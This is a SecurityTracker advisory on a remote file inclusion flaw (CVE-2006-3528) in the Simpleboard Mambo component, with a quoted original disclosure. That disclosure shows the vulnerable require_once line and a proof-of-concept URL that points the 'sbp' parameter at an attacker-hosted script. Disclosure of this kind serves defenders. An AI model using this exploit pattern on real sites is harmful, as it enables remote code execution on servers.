SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   Simpleboard Vendors:   de Graaff, Jan
Simpleboard Include File Bug in 'file_upload.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016824
SecurityTracker URL:  http://securitytracker.com/id/1016824
CVE Reference:   CVE-2006-3528   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 12 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.0
Description:   A vulnerability was reported in Simpleboard. A remote user can include and execute arbitrary code on the target system.

The 'file_upload.php' script does not properly validate user-supplied input in the 'sbp' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/components/com_simpleboard/file_upload.php?sbp=[evil_script]

rUnViRuS discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  mamboxchange.com/projects/simpleboard (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  9 Sep 2006 22:55:55 -0000
Subject:  SimpleBoard Mambo Component 1.1.0 Remote File Include

[W]orld [D]efacers Team

======================================

--------------------Summary----------------

eVuln ID: WD23

Vendor:  SimpleBoard Mambo Component 1.1.0

Vendor's Web Site: mamboxchange.com/projects/simpleboard

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS (worlddefacers.de)

-----------------Description---------------

require_once("$sbp/sb_helpers.php");


--------------PoC/Exploit----------------------

http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_script]

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC